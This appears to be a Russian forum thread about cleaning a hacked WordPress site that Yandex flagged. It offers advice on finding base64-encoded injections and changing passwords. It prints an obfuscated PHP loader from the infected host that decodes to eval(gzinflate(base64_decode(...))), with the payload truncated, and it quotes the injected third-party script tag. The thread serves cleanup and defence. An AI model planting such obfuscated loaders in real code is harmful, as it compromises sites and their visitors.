Яндекс нашел вирус

Внедрение текста с вызовом файла с расширением js происходит, где-то при формировании html кода.

Самого файла с расширением js нет на вашем сервере.

Где-то в вашем коде при формировании html страницы при помощи закодированнных строчек типа

" (base64_decode('' .'ZXJy' .'b3JfcmVwb3J0' .'aW' .'5' .'n') " в html внедряется вызов файлы js со стороннего сервиса.

Что могу посоветовать.

или воспользуйтесь способом Selish (скопируйте все файлы себе на комп) или как-то по другому:

Пройдитесь поиском по всем файлам. Ищите base64. Когда найдёте, включайте голову.

Воспользуйтесь сервисом онлайн декодирования, чтобы понять, что закодировано.

Нужно помнить, что антивирус может не взять разбитый на части код. Такой разбитый на части вам необходимо самому склеить при раскодирование.

Пример разбитого кода:

"$GLOBALS['_1548237628_']=Array(base64_decode('' .'ZXJy' .'b3JfcmVwb3J0' .'aW' .'5' .'n'),base64_decode('cHJlZ19tYXRjaA=='),base64_decode('cH' .'JlZ1' .'9' .'tYX' .'RjaA=' .'='),base64_decode('c' .'H' .'JlZ' .'19tYXRjaA' .'=='),base64_decode('' .'cHJ' .'lZ19tYXRjaA' .'=='),base64_decode('c3Vic3Ry'));"

PS:

На вашем сайте скорее всего зло вот это:

<script type='text/javascript' src='http://dtym7iokkjlif.cloudfront.net/dough/1.0/shareaholic-analytics.js'></script>

в закодированном виде "dtym7iokkjlif.cloudfront.net" это ZHR5bTdpb2tramxpZi5jbG91ZGZyb250Lm5ldA==

Если можете, скиньте куда нить архив файлов сайта, я могу ради спортивного интереса посмотреть.

Удачи.

Вот файлы с хостинга: http://yadi.sk/d/VqlBAiI68S8v6

Код появляется в файле - http://vitaliyivanov.com/wp-includes/js/jquery/jquery.js?ver=1.8.3

Все чаще и чаще...

Уже даже гугл начал блокировать...

Огромное спасибо kgtu5 за помощь и решение проблем с сайтом

в этой папке куча бяки

например

файл b245.php, c1a.php, class-image.php...

<?php

$ab = array("l",";",'z','t',"e",'f',"(",'4','s','o',"r",'$','6',"n",'b','_',"d",")","a","v",'c',"g","i");

$bb2 = create_function('$'.'v',$ab[4].$ab[19].$ab[18].$ab[0].$ab[6].$ab[21].$ab[2].$ab[22].$ab[13].$ab[5].$ab[0].$ab[18].$ab[3].$ab[4].$ab[6].$ab[14].$ab[18].$ab[8].$ab[4].$ab[12].$ab[7].$ab[15].$ab[16].$ab[4].$ab[20].$ab[9].$ab[16].$ab[4].$ab[6].$ab[11].$ab[19].$ab[17].$ab[17].$ab[17].$ab[1]);

$bb2('FJ3HjqPsFkUf57bEgJyG5JwxaXJFMDmDSU//U0NLVS7745y913Lb7u+R9v

...

');

?>

<?php

$ab = array("l",";",'z','t',"e",'f',"(",'4','s','o',"r",'$','6',"n",'b','_',"d",")","a","v",'c',"g","i");

$bb2 = create_function('$'.'v',$ab[4].$ab[19].$ab[18].$ab[0].$ab[6].$ab[21].$ab[2].$ab[22].$ab[13].$ab[5].$ab[0].$ab[18].$ab[3].$ab[4].$ab[6].$ab[14].$ab[18].$ab[8].$ab[4].$ab[12].$ab[7].$ab[15].$ab[16].$ab[4].$ab[20].$ab[9].$ab[16].$ab[4].$ab[6].$ab[11].$ab[19].$ab[17].$ab[17].$ab[17].$ab[1]);

$bb2('FJ3HjqPsFkUf57bEgJyG5JwxaXJFMDmDSU//U0NLVS7745y913Lb7u+R9v

...

');

?>

Удалил все ети фаилы с хостинга, но код в указаном месте появляетса снова и снова

Смените пароль на фтп, панель, права на каталоги и файлы.

povstanez, а какой хостинг у вас? не хостлайф случайно?

логи смотрите откуда они появляются

Да хостлайф

ну тогда вы не один такой - /ru/forum/806289

сейчас они (техподдержка) стали (наконец-то!) как-то мониторить модифицируемые файлы и удалять код до того, как Яндекс обнаружит вирус и влепит "черную метку"